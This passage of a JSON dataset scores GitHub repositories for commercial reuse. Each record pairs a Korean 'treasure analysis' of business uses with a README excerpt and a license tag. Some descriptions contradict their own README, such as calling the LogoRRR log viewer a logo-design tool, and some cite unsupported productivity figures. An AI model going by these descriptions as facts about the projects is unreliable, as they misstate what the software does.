src=\"https://github.com/roadrunner-server/.github/assets/8040338/040fb694-1dd3-4865-9d29-8e0748c2c8b8\">\n  </picture>\n</a>\n<p align=\"center\">\n <a href=\"https://packagist.org/packages/spiral/roadrunner\"><img src=\"https://poser.pugx.org/spiral/roadrunner/version\"></a>\n\t<a href=\"https://pkg.go.dev/github.com/roadrunner-server/roadrunner/v2025?tab=doc\"><img src=\"https://godoc.org/github.com/roadrunner-server/roadrunner/v2025?status.svg\"></a>\n    <a href=\"https://twitter.com/spiralphp\"><img src=\"https://img.shields.io/twitter/follow/spiralphp?style=social\"></a>\n    <a href=\"https://codecov.io/gh/roadrunner-server/roadrunner/\"><img src=\"https://codecov.io/gh/roadrunner-server/roadrunner/branch/master/graph/badge.svg\"></a>\n\t<a href=\"https://github.com/road","composite_score":0.0177,"license_safety_tag":"safe"},{"name":"rg3dengine/rg3d","github_url":"https://github.com/rg3dengine/rg3d","stars":7,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# RG3D 엔진 보물 분석\n\n## 왜 보물인가\n3D 게임과 애니메이션을 만드는 데 필요한 핵심 도구를 누구나 무료로 쓸 수 있는 오픈소스 엔진입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발 SaaS 플랫폼**: 초보자도 쉽게 3D 게임을 만들 수 있는 웹 기반 게임 제작 서비스로 운영\n2. **건축/제조 시뮬레이션 API**: 건설사나 공장에서 ","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://fyrox.rs/\">\n    <img src=\"pics/logo.png\" width=\"128\" height=\"128\" alt=\"Fyrox\" />\n  </a>\n  <h1>Fyrox - a modern Rust game engine</h1>\n</div>\n\n[![License (MIT)](https://img.shields.io/crates/l/fyrox)](https://github.com/FyroxEngine/Fyrox/blob/master/LICENSE.md)\n[![CI Status](https://github.com/FyroxEngine/Fyrox/actions/workflows/ci.yml/badge.svg)](https://github.com/FyroxEngine/Fyrox/actions/workflows/ci.yml)\n[![Crates.io](https://img.shields.io/crates/v/fyrox)](https://crates.io/crates/fyrox)\n[![docs.rs](https://img.shields.io/badge/docs-website-blue)](https://docs.rs/Fyrox/)\n[![Discord](https://img.shields.io/discord/756573453561102427)](https://discord.gg/xENF5Uh)\n[![Lines of code](https://tokei.rs/b1/github/FyroxEngine/Fyrox)](https://github.com/FyroxEngine/Fyrox)\n\nA feature-rich, production-ready, general purpose 2D/3D game engine written in Rust with a scene editor.\n_Formerly known as rg3d_\n\n## [Learning materials](https://fyrox-book.github.i","composite_score":0.0177,"license_safety_tag":"safe"},{"name":"tridactyl/tridactyl","github_url":"https://github.com/tridactyl/tridactyl","stars":5,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# Tridactyl 저장소 분석\n\n## 왜 보물인가\n웹 브라우저를 마우스 없이 키보드로만 제어할 수 있게 해주는 도구로, 빠른 작업을 원하는 전문가들의 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 브라우저 확장 프로그램으로 판매하여 월정액 구독 모델로 운영\n2. **내부 업무 도구**: 대량의 웹 기반 데이터를 다","readme_excerpt":"<h1 align=\"center\">\n<br>\n<img src=\"src/static/logo/Tridactyl_200px.png\" alt=\"Tridactyl Logo\" width=\"200\">\n<br>\nTridactyl\n<br>\n</h1>\n\n<h4 align=\"center\">Replace Firefox's default control mechanism with one modelled on the one true editor, Vim.</h4>\n\n<p align=\"center\">\n<a href=\"https://travis-ci.org/tridactyl/tridactyl\"><img src=\"https://travis-ci.org/tridactyl/tridactyl.svg?branch=master\" alt=\"Build Status\"></a>\n<a href=\"https://matrix.to/#/#tridactyl:matrix.org\"><img src=\"https://img.shields.io/badge/matrix-join%20chat-green\" alt=\"Matrix Chat\"></a>\n<a href=\"https://gitter.im/tridactyl/Lobby\"><img src=\"https://badges.gitter.im/Join%20Chat.svg\" alt=\"Join Gitter Chat\"></a>\n<a href=\"https://discord.gg/DWbNGTAvmh\"><img src=\"https://img.shields.io/discord/854326924402622474?color=%235865F2&label=discord\" alt=\"Join Discord Chat\"></a>\n<a href=\"https://addons.mozilla.org/en-US/firefox/addon/tridactyl-vim/\"><img src=\"https://img.shields.io/amo/rating/tridactyl-vim\" alt=\"Mozilla Addon Store\"></a>","composite_score":0.0176,"license_safety_tag":"unknown"},{"name":"scala-js/scala-js","github_url":"https://github.com/scala-js/scala-js","stars":5,"language":"Scala","license":"apache-2.0","abandonment_months":0,"description":"# Scala.js 저장소 분석\n\n## 왜 보물인가\n자바스크립트로 웹 애플리케이션을 만들 때 더 안전하고 효율적인 개발 환경을 제공하는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 서비스 SaaS**: 거래 데이터 처리가 많은 웹 애플리케이션에서 오류를 줄일 수 있는 환경 제공\n2. **내부 업무 도구**: 대규모 회사의 직원 관리 시스템이나 데이","readme_excerpt":"<p align=\"left\">\n  <a href=\"http://www.scala-js.org/\">\n    <img src=\"http://www.scala-js.org/assets/img/scala-js-logo.svg\" height=\"128\">\n    <h1 align=\"left\">Scala.js</h1> \n  </a>\n</p>\n\nChat: [#scala-js](https://discord.com/invite/scala) on Discord.\n\nThis is the repository for\n[Scala.js, the Scala to JavaScript compiler](https://www.scala-js.org/).\n\n* [Report an issue](https://github.com/scala-js/scala-js/issues)\n* [Developer documentation](./DEVELOPING.md)\n* [Contributing guidelines](./CONTRIBUTING.md)\n\n## License\n\nScala.js is distributed under the\n[Apache License Version 2.0](https://www.apache.org/licenses/LICENSE-2.0).\n","composite_score":0.0176,"license_safety_tag":"safe"},{"name":"elfshaker/elfshaker","github_url":"https://github.com/elfshaker/elfshaker","stars":22,"language":"Rust","license":"Apache-2.0","abandonment_months":1,"description":"# elfshaker 저장소 분석\n\n## 왜 보물인가\n프로그램 실행 파일의 변경 사항을 정확하게 추적하고 버전 관리할 수 있는 도구로, 소프트웨어 개발사들이 품질 관리에 드는 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소프트웨어 개발사를 위한 자동화된 프로그램 변경 분석 및 리포팅 플랫폼\n2. **내부 ","readme_excerpt":"# `elfshaker`\n\n## 400 GiB -> 100 MiB, with 1s access time†; [when applied to clang builds](https://github.com/elfshaker/manyclangs).\n\nelfshaker is a low-footprint, high-performance version control system fine-tuned for binaries.\n\n- elfshaker is a CLI tool written in the [Rust programming language](https://www.rust-lang.org/).\n\n- It stores snapshots of directories into highly-compressed pack files and provides fast on-demand access to the stored files. It is particularly good for storing lots of similar files, for example object files from an incremental build.\n\n- It allows few-second access to any commit of clang with the [manyclangs project](https://github.com/elfshaker/manyclangs). For example, this accelerates bisection of [LLVM](https://llvm.org/) by a factor of 60x! This is done by extracting builds of LLVM on-demand from locally stored elfshaker packs, each of which contains ~1,800 builds and is about 100 MiB in size, even though the full originals would take TiBs to store! Extra","composite_score":0.0175,"license_safety_tag":"safe"},{"name":"Alecaddd/sequeler","github_url":"https://github.com/Alecaddd/sequeler","stars":7,"language":"Vala","license":"gpl-3.0","abandonment_months":1,"description":"# Sequeler 상용화 분석\n\n## 왜 보물인가\n데이터베이스를 쉽게 관리할 수 있는 사용자 친화적 도구로, 기술 담당자들의 반복적인 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업과 스타트업을 위한 웹 기반 데이터베이스 관리 플랫폼으로 월 구독료 수익 창출\n2. **내부 업무 도구**: 대기업","readme_excerpt":"# ![Sequeler](data/assets/sequeler-logo-transparent.png)\n> Friendly SQL Client\n\n[![Build Status](https://github.com/ellie-commons/sequeler/actions/workflows/ci.yml/badge.svg)](https://github.com/ellie-commons/sequeler/actions/workflows/ci.yml)\n[![Translation status](https://hosted.weblate.org/widgets/sequeler/-/svg-badge.svg)](https://hosted.weblate.org/engage/sequeler/?utm_source=widget)\n\nSequeler is a native Linux SQL client built in Vala and Gtk. It allows you to connect to your local and remote databases, write SQL in a handy text editor with language recognition, and visualize SELECT results in a Gtk.Grid Widget.\n\n![Database view in the light mode](data/assets/screenshots/database-light.png#gh-light-mode-only) ![Database view in the dark mode](data/assets/screenshots/database-dark.png#gh-dark-mode-only)\n\n## Supported Databases\n- PostgreSQL\n- MariaDB/MySQL\n- SQLite\n\n## Get it from the elementary OS AppCenter!\nSequeler, is primarily available from the AppCenter of elementary OS. Dow","composite_score":0.0175,"license_safety_tag":"restricted"},{"name":"PureStake/moonbeam","github_url":"https://github.com/PureStake/moonbeam","stars":5,"language":"TypeScript","license":"GPL-3.0","abandonment_months":0,"description":"# Moonbeam 저장소 분석\n\n## 왜 보물인가\n블록체인 네트워크를 쉽게 만들고 관리할 수 있는 기반 기술로, 암호화폐 산업의 성장에 따라 수요가 계속 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 개발 플랫폼 SaaS**: 중소 암호화폐 프로젝트들이 자신의 블록체인을 구축하도록 돕는 클라우드 서비스로 월 구독료 수취\n2. **기업용 ","readme_excerpt":"# ![Moonbeam](media/Banner.jpg)\n\n# Information\n\n[![Tests](https://github.com/moonbeam-foundation/moonbeam/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/moonbeam-foundation/moonbeam/actions/workflows/build.yml?query=branch:master)\n\n**An Ethereum compatible [Parachain](https://docs.polkadot.com/polkadot-protocol/architecture/parachains) built with the [Polkadot-SDK](https://github.com/paritytech/polkadot-sdk).**\n\n👉 _Discover the Moonbeam project at [moonbeam.network](https://moonbeam.network)._<br>\n👉 _Learn to [use the Moonbeam network](https://docs.moonbeam.network/) with our technical docs._<br>\n👉 _Reference our [crate-level docs (rustdocs)](https://moonbeam-foundation.github.io/moonbeam) to contribute._\n\n## Run Moonbeam with zombienet\n```bash\n# Start Polkadot relay with Moonbeam parachain\nmake start-zombienet-moonbeam\n# Start Kusama relay with Moonriver parachain\nmake start-zombienet-moonriver\n```\n\n## Run a Moonbase Alpha (Moonbeam TestNet) Node with Docker\n","composite_score":0.0174,"license_safety_tag":"restricted"},{"name":"Jagadeeshftw/grainlify","github_url":"https://github.com/Jagadeeshftw/grainlify","stars":17,"language":"Rust","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.0173,"license_safety_tag":"unknown"},{"name":"mdaines/viz.js","github_url":"https://github.com/mdaines/viz.js","stars":5,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# viz.js 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 눈에 보이는 그림으로 자동으로 변환해주는 도구로, 데이터를 다루는 모든 비즈니스에서 필요로 합니다.\n\n## 어디에 쓸 수 있나\n- **데이터 분석 SaaS**: 회계사나 마케터가 숫자 데이터를 자동으로 차트·다이어그램으로 변환하여 보고서 작성 시간을 90% 단축\n- **내부 업무 도구**: 기","readme_excerpt":"# Viz.js\n\nThis is a collection of packages for working with <a href=\"https://graphviz.org\">Graphviz</a> in JavaScript. The main package, [viz](./packages/viz), is a WebAssembly build of Graphviz with a simple JavaScript wrapper.\n\nWith Viz.js, you can easily render a graph diagram as an SVG element to display it in a webpage:\n\n```js\nimport * as Viz from \"@viz-js/viz\";\n\nViz.instance().then(viz => {\n  document.body.appendChild(viz.renderSVGElement(\"digraph { a -> b }\"))\n});\n```\n\nOther packages:\n\n- [lang-dot](./packages/lang-dot) — CodeMirror language support for the Graphviz DOT language.\n\n## Install\n\n- Viz.js is published on NPM as [`@viz-js/viz`](https://www.npmjs.com/package/@viz-js/viz).\n- lang-dot is published on NPM as [`@viz-js/lang-dot`](https://www.npmjs.com/package/@viz-js/lang-dot).\n\n## API\n\n[API Reference](https://viz-js.com/api/)\n","composite_score":0.0172,"license_safety_tag":"safe"},{"name":"DeterminateSystems/nix-netboot-serve","github_url":"https://github.com/DeterminateSystems/nix-netboot-serve","stars":12,"language":"Rust","license":"MIT","abandonment_months":1,"description":"# nix-netboot-serve 분석 보고서\n\n## 왜 보물인가\n컴퓨터를 네트워크로 빠르게 부팅하고 관리하는 기술로, 대규모 서버를 운영하는 기업들이 매우 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 서버 제공 서비스**: AWS, 네이버클라우드 같은 회사들이 고객의 서버를 빠르게 시작할 때 사용\n2. **회사 IT 관리 도","readme_excerpt":"# nix-netboot-serve\n\nDynamically generate netboot images for arbitrary NixOS system closures,\nprofiles, or configurations with 10s iteration times.\n\n## Usage\n\nCreate working directories for it:\n\n```\nmkdir ./gc-roots ./profiles ./configurations ./cpio-cache\n```\n\nThen start up the server:\n\n```\nRUST_LOG=info cargo run -- --gc-root-dir ./gc-roots --config-dir ./configurations --profile-dir ./profiles/ --cpio-cache-dir ./cpio-cache/ --listen 127.0.0.1:3030\n```\n\nSee `./boot.sh` for an example of booting with QEMU.\n\n## Booting an absolute closure\n\n### How To\n\nTo boot from a specific closure like\n`/nix/store/0m60ngchp6ki34jpwmpbdx3fby6ya0sf-nixos-system-nginx-21.11pre307912.fe01052444c`,\nuse `/boot/0m60ngchp6ki34jpwmpbdx3fby6ya0sf-nixos-system-nginx-21.11pre307912.fe01052444c/netboot.ipxe`\nas your chain url.\n\n## Behavior\n\nAs long as that closure exists on the host, that closure will always\nbe booted, unchanged.\n\n## Booting a profile\n\n### How To\n\nIn the `profiles` directory, create symlinks to ","composite_score":0.0172,"license_safety_tag":"safe"},{"name":"BespokeSynth/BespokeSynth","github_url":"https://github.com/BespokeSynth/BespokeSynth","stars":7,"language":"C++","license":"GPL-3.0","abandonment_months":1,"description":"# BespokeSynth 상용화 분석\n\n## 왜 보물인가\n음악 제작자가 자신의 필요에 맞춰 완전히 맞춤형 악기를 직접 만들 수 있는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 음악 제작 SaaS 플랫폼**\n- 클라우드 기반 맞춤형 악기 빌더 서비스로 구독 모델 운영\n- 제작자들이 자신의 독특한 음향을 클라우드에서 설계하고 공유\n\n**2. ","readme_excerpt":"[![Build Status](https://dev.azure.com/awwbees/BespokeSynth/_apis/build/status/BespokeSynth.BespokeSynth?branchName=main)](https://dev.azure.com/awwbees/BespokeSynth/_build/latest?definitionId=1&branchName=main)\n[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg)](code_of_conduct.md)\n\n\n# Bespoke Synth\n\nA software modular synth that I've been building for myself since 2011, and now you can use it!\n\n[Nightly Build](https://github.com/BespokeSynth/BespokeSynth/releases/tag/Nightly) (updated every commit)\n\nYou can find the most recent builds for Mac/Windows/Linux at http://bespokesynth.com, or in the [Releases](https://github.com/BespokeSynth/BespokeSynth/releases) section on GitHub.\n\nJoin the [Bespoke Discord](https://discord.gg/YdTMkvvpZZ) for support and to discuss with the community.\n\n\n## Documentation\n\n* [Official documentation](https://www.bespokesynth.com/docs/)\n* [Searchable, community-written documentation](https://github.com/BespokeSynth/B","composite_score":0.017,"license_safety_tag":"restricted"},{"name":"QuantStack/xeus","github_url":"https://github.com/QuantStack/xeus","stars":15,"language":"C++","license":"bsd-3-clause","abandonment_months":1,"description":"# QuantStack/xeus 프로젝트 분석\n\n## 왜 보물인가\n프로그래밍 언어를 웹 환경에서 실행할 수 있게 해주는 기술로, 복잡한 계산을 누구나 브라우저에서 쉽게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 데이터 분석 플랫폼**: 통계나 차트 분석이 필요한 기업이 자신의 서비스에 내장하여 제공\n2. **교육용 학습 도구**: 프로그래","readme_excerpt":"# ![xeus](docs/source/xeus.svg)\n[![GithubActions](https://github.com/jupyter-xeus/xeus/actions/workflows/main.yml/badge.svg)](https://github.com/jupyter-xeus/xeus/actions/workflows/main.yml)\n[![Documentation Status](http://readthedocs.org/projects/xeus/badge/?version=latest)](https://xeus.readthedocs.io/en/latest/?badge=latest)\n[![Zulip](https://img.shields.io/badge/social_chat-zulip-blue.svg)](https://jupyter.zulipchat.com/#narrow/channel/539737-Jupyter-Kernels)\n\nC++ implementation of the Jupyter Kernel protocol\n\n## Introduction\n\n`xeus` is a library meant to facilitate the implementation of kernels for Jupyter. It takes the\nburden of implementing the Jupyter Kernel protocol so developers can focus on implementing the\ninterpreter part of the kernel.\n\nSeveral Jupyter kernels are built upon xeus, such as [`xeus-cling`](https://github.com/jupyter-xeus/xeus-cling),\na kernel for the C++ programming language, and [`xeus-python`](https://github.com/jupyter-xeus/xeus-python), an alternative Py","composite_score":0.017,"license_safety_tag":"safe"},{"name":"CartoDB/cartoframes","github_url":"https://github.com/CartoDB/cartoframes","stars":5,"language":"Python","license":"bsd-3-clause","abandonment_months":1,"description":"# CartoDB/cartoframes 평가 보고서\n\n## 왜 보물인가\n지도 위에 데이터를 시각화하는 작업을 누구나 쉽게 할 수 있게 만든 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 부동산 중개 플랫폼에서 매물 위치와 가격을 지도에 표시하는 기능\n2. **내부 업무 도구**: 유통사 물류팀이 배송지점과 배송 경로를 지도로 관리하는","readme_excerpt":"***********\nCARTOframes\n***********\n\n.. image:: https://github.com/CartoDB/cartoframes/actions/workflows/cartoframes-ci.yml/badge.svg?branch=develop\n    :target: https://github.com/CartoDB/cartoframes/actions/workflows/cartoframes-ci.yml\n.. image:: https://img.shields.io/badge/pypi-v1.2.4-orange\n    :target: https://pypi.org/project/cartoframes/1.2.4\n\nA Python package for integrating `CARTO <https://carto.com/>`__ maps, analysis, and data services into data science workflows.\n\nPython data analysis workflows often rely on the de facto standards `pandas <http://pandas.pydata.org/>`__ and `Jupyter notebooks <http://jupyter.org/>`__. Integrating CARTO into this workflow saves data scientists time and energy by not having to export datasets as files or retain multiple copies of the data. Instead, CARTOframes give the ability to communicate reproducible analysis while providing the ability to gain from CARTO's services like hosted, dynamic or static maps and `Data Observatory <https://carto.","composite_score":0.017,"license_safety_tag":"safe"},{"name":"tailwindlabs/tailwindcss-intellisense","github_url":"https://github.com/tailwindlabs/tailwindcss-intellisense","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":1,"description":"# Tailwind CSS IntelliSense 상품화 분석\n\n## 왜 보물인가\n웹 디자인 도구를 사용할 때 자동완성 기능으로 작업 속도를 5배 빠르게 해주는 편의 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 빌더/노코드 플랫폼에 내장하여 사용자 경험 향상\n2. **내부 업무 도구**: 개발팀의 웹페이지 제작 속도 40% 단축","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/tailwindlabs/tailwindcss-intellisense/main/packages/vscode-tailwindcss/.github/banner.png\" alt=\"\" />\n\nTailwind CSS IntelliSense enhances the Tailwind development experience by providing Visual Studio Code users with advanced features such as autocomplete, syntax highlighting, and linting.\n\n## Installation\n\n**[Install via the Visual Studio Code Marketplace →](https://marketplace.visualstudio.com/items?itemName=bradlc.vscode-tailwindcss)**\n\nIn order for the extension to activate you must have [`tailwindcss` installed](https://tailwindcss.com/docs/installation) and one of these:\n\n- For v4 and later, a `.css` file that imports a Tailwind CSS stylesheet (e.g. `@import \"tailwindcss\"`)\n- For v3 and earlier, a [Tailwind CSS config file](https://v3.tailwindcss.com/docs/configuration#creating-your-configuration-file) named `tailwind.config.{js,cjs,mjs,ts,cts,mts}` in your workspace.\n- For v3 and earlier, a stylesheet that points to a config file via `@","composite_score":0.017,"license_safety_tag":"unknown"},{"name":"Pathoschild/SMAPI","github_url":"https://github.com/Pathoschild/SMAPI","stars":5,"language":"C#","license":"lgpl-3.0","abandonment_months":1,"description":"# Pathoschild/SMAPI 분석\n\n## 왜 보물인가\n인기 있는 게임을 개인이 자유롭게 확장할 수 있도록 돕는 플랫폼으로, 창의적인 게임 커뮤니티 활동을 지원합니다.\n\n## 어디에 쓸 수 있나\n1. **게임 모드 마켓플레이스 SaaS**: 게임 모드를 사고팔 수 있는 온라인 플랫폼으로, 크리에이터가 자신의 작품을 판매하고 일반 게이머가 쉽게 설치할 ","readme_excerpt":"**SMAPI** is an open-source modding framework and API for [Stardew Valley](https://stardewvalley.net/)\nthat lets you play the game with mods. It's safely installed alongside the game's executable, and\ndoesn't change any of your game files. It serves seven main purposes:\n\n1. **Load mods into the game.**  \n   _SMAPI loads mods when the game is starting up so they can interact with it. (Code mods aren't\n   possible without SMAPI to load them.)_\n\n2. **Provide APIs and events for mods.**  \n   _SMAPI provides APIs and events which let mods interact with the game in ways they otherwise\n   couldn't._\n\n3. **Rewrite mods for compatibility.**  \n   _SMAPI rewrites mods' compiled code before loading them so they work on Linux/macOS/Windows\n   without the mods needing to handle differences between the Linux/macOS and Windows versions of\n   the game. In some cases it also rewrites code broken by a game update so the mod doesn't break._\n\n5. **Intercept errors and automatically fix saves.**  \n   _SMAPI","composite_score":0.017,"license_safety_tag":"restricted"},{"name":"ahrm/sioyek","github_url":"https://github.com/ahrm/sioyek","stars":112,"language":"C","license":"GPL-3.0","abandonment_months":0,"description":"# Sioyek 저장소 분석\n\n## 왜 보물인가\nPDF를 읽을 때 논문이나 교과서처럼 복잡한 문서를 더 효율적으로 탐색하고 관리할 수 있는 특화된 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 학술 논문 관리 SaaS**\n- 대학생·연구원이 구독하는 논문 읽기 플랫폼으로 제공 (월 $9.99~$29.99)\n\n**2. 기업 연구팀 내부 도구**\n- 제약사","readme_excerpt":"# Sioyek\n\nSioyek is a PDF viewer with a focus on textbooks and research papers.\n\n# Development Branch FAQ\n\n## Q: There are build errors with Qt 5.*.\n\nA: If you are building the development branch you need to use Qt 6.7 or 6.8.\n\n## Q: On MacOS I get \"sioyek is damaged and cannot be opened. It is recommended to eject the image.\".\n\nA: This is related to macOS quarantine. See https://github.com/ahrm/sioyek/discussions/1156#discussioncomment-10822738 .\n\n\n## Contents\n* [Installation](#install)\n* [Documentation](#documentation)\n* [Video Demo](#feature-video-overview)\n* [Features](#features)\n* [Build Instructions](#build-instructions)\n* [Buy Me a Coffee (or a Book!)](#donation)\n\n## Install\n### Official packages\nThere are installers for Windows, macOS and Linux. See [Releases page](https://github.com/ahrm/sioyek/releases).\n\n### Homebew Cask\nThere is a homebrew cask available here: https://formulae.brew.sh/cask/sioyek. Install by running:\n```\nbrew install --cask sioyek\n```\n### Third-party packag","composite_score":0.017,"license_safety_tag":"restricted"},{"name":"countercept/chainsaw","github_url":"https://github.com/countercept/chainsaw","stars":10,"language":"Rust","license":"GPL-3.0","abandonment_months":1,"description":"# Chainsaw 저장소 분석\n\n## 왜 보물인가\nWindows 컴퓨터의 보안 침해 흔적을 자동으로 찾아내는 도구로, 기업의 사이버 보안 담당자들이 해킹 사건 조사에 필수적으로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 진단 SaaS 서비스**\n- \"우리 컴퓨터가 해킹당했나요?\" 걱정하는 회사들을 위해 온라인 진단 서비스로 제공","readme_excerpt":"\n<div align=\"center\">\n <p>\n  <h1>\n   Rapidly Search and Hunt through Windows Forensic Artefacts\n  </h1>\n </p>\n<img style=\"padding:0;vertical-align:bottom;\" height=\"76\" width=\"300\" src=\"images/chainsaw.png\"/>\n</div>\n\n---\nChainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and the MFT file. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.\n\n## Features\n\n - :dart: Hunt for threats using [Sigma](https://github.com/SigmaHQ/sigma) detection rules and custom Chainsaw detection rules\n - :mag: Search and extract forensic artefacts by string matching, and regex patterns\n - :date: Create execution timelines by analysing Shimcache artefacts and enriching them with Amcache data\n - :bulb: Analyse the SRUM database and provide insights about it\n - :arrow_down: Du","composite_score":0.017,"license_safety_tag":"restricted"},{"name":"Ovyerus/prismaliser","github_url":"https://github.com/Ovyerus/prismaliser","stars":11,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Prismaliser 상용화 분석\n\n## 왜 보물인가\n데이터베이스 설계도를 자동으로 이쁘게 그려주는 도구로, 개발자들이 복잡한 데이터 구조를 한눈에 이해하고 공유할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 데이터베이스 구조를 시각화하여 협업하는 웹 애플리케이션으로 판매\n2. **내부 업무 도구**: 대기업의 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://prismaliser.app\">\n    <img src=\".resources/readme-banner.svg\" alt=\"Visualise your Prisma schema - Prismaliser\">\n  </a>\n</p>\n\n---\n\n**Prismaliser** is a visualisation webapp for [Prisma](https://prisma.io)\nschemas. It allows you to visually explore your schema and the relations between\nyour models, by showing links between the different types of relations in the\nschema (many-to-many, one-to-many, one-to-one), similar to an\n[Entity-relationship model](https://en.wikipedia.org/wiki/Entity-relationship_model).\n\nPrismaliser is a fully open-source Next.js application and is easily self-hostable if\nyou wish to, but a hosted version is also available at\n[prismaliser.app](https://prismaliser.app) if you just want to use it instead.\n\n## Installation\n\nPrismaliser is a Next.js application, and as such it requires\n[Node.js](https://nodejs.org) to be installed in order to run.\n[Yarn](https://yarnpkg.com) is also recommended as it has a (subjectively) nicer\nCLI in","composite_score":0.0169,"license_safety_tag":"safe"},{"name":"rladstaetter/LogoRRR","github_url":"https://github.com/rladstaetter/LogoRRR","stars":9,"language":"Scala","license":"Apache-2.0","abandonment_months":1,"description":"# LogoRRR 프로젝트 분석\n\n## 왜 보물인가\n로고 디자인을 자동으로 생성하고 관리할 수 있는 도구로, 전문 디자이너 없이도 기업 브랜딩을 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 월 구독료를 내고 자신의 로고를 만들고 수정할 수 있는 온라인 플랫폼\n2. **내부 업무 도구**: 중소기업의 마케팅팀이 빠","readme_excerpt":"# `LogoRRR`\n\nLogoRRR is a desktop log viewer and text analysis tool designed to help you spot recurring patterns, isolate events of interest, and work through large text files faster.\n\n## Project Status\n\n`26.2.0` is the final open-source release of LogoRRR under the Apache License 2.0.\n\nThis repository remains public as the historical source repository for the open-source LogoRRR line up to and including `26.2.0`. Future LogoRRR releases are developed separately and are not published from this repository.\n\nFor current product information, downloads, and release announcements, visit:\n\n[https://www.logorrr.app](https://www.logorrr.app)\n\n## Downloads\n\nSource code and binary downloads for the final open-source release are available here:\n\n[https://logorrr.app/downloads/26.2.0/](https://logorrr.app/downloads/26.2.0/)\n\nThat page includes:\n- Source code for `26.2.0`\n- Binary downloads for supported platforms\n- Release-specific assets and notes\n\n## Open-Source Release Scope\n\nThe Apache-2.0 lic","composite_score":0.0169,"license_safety_tag":"safe"},{"name":"traviscross/mtr","github_url":"https://github.com/traviscross/mtr","stars":10,"language":"C","license":"gpl-2.0","abandonment_months":0,"description":"# traviscross/mtr 프로젝트 분석\n\n## 왜 보물인가\n인터넷 연결 상태를 진단하는 오픈소스 도구로, 네트워크 문제를 빠르게 파악할 수 있어 IT 관리자와 기업들이 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 네트워크 모니터링 플랫폼으로 기업의 인터넷 품질을 실시간 추적하는 대시보드 제공\n2.","readme_excerpt":"WHAT IS MTR?\n===\n\nmtr combines the functionality of the 'traceroute' and 'ping' programs\nin a single network diagnostic tool.\n\nAs mtr starts, it investigates the network connection between the host\nmtr runs on and a user-specified destination host.  It sends probes to\nthe destination with successively larger time-to-live values, and uses\nthe responses from intervening routers to discover and measure the path.\nAs it does this, it prints running statistics for each hop.\n\nIntermediate routers may be configured to never send these ICMP\nresponses, or may rate-limit them, so apparent loss at an intermediate\nhop does not always mean that forwarded traffic is being lost at that\npoint.\n\nmtr is distributed under the GNU General Public License version 2.\nSee the COPYING file for details.\n\nINSTALLING\n===\n\nIf you're building this from a tarball, compiling mtr is as\nsimple as:\n\n\t./configure && make\n\nPlease note that this refers to the tarballs from\n https://www.bitwizard.nl/mtr/files/\nand not the ta","composite_score":0.0167,"license_safety_tag":"restricted"},{"name":"nextcord/nextcord","github_url":"https://github.com/nextcord/nextcord","stars":11,"language":"Python","license":"MIT","abandonment_months":1,"description":"# Nextcord 저장소 분석\n\n## 왜 보물인가\n디스코드 같은 채팅 앱을 직접 만들고 싶은 개발자들을 위한 무료 도구 모음이라서, 누구나 쉽게 커뮤니티 기반 서비스를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 커뮤니티 플랫폼**: 게임사에서 플레이어들이 모여 소통하고 팀을 구성하는 자체 채팅 시스템 구축\n2. **교육용 학습 커뮤니티","readme_excerpt":".. image:: https://raw.githubusercontent.com/nextcord/nextcord/master/assets/repo-banner.svg\n   :alt: Nextcord\n\n.. image:: https://img.shields.io/discord/881118111967883295?color=blue&label=discord\n   :target: https://discord.gg/nextcord\n   :alt: Discord server invite\n.. image:: https://img.shields.io/pypi/v/nextcord.svg\n   :target: https://pypi.org/project/nextcord/\n   :alt: PyPI version info\n.. image:: https://img.shields.io/pypi/dm/nextcord?color=informational&label=pypi%20downloads\n   :target: https://pypi.org/project/nextcord/\n   :alt: PyPI version info\n.. image:: https://img.shields.io/pypi/pyversions/nextcord.svg\n   :target: https://pypi.org/project/nextcord/\n   :alt: PyPI supported Python versions\n.. image:: https://img.shields.io/readthedocs/nextcord\n   :target: https://docs.nextcord.dev/\n   :alt: Nextcord documentation\n\nNextcord\n--------\n\nA modern, easy-to-use, feature-rich, and async-ready API wrapper for Discord written in Python.\n\n\nKey Features\n-------------\n\n- Modern Pyth","composite_score":0.0167,"license_safety_tag":"safe"},{"name":"cessen/ropey","github_url":"https://github.com/cessen/ropey","stars":7,"language":"Rust","license":"mit","abandonment_months":1,"description":"# Ropey 저장소 분석\n\n## 왜 보물인가\n문서 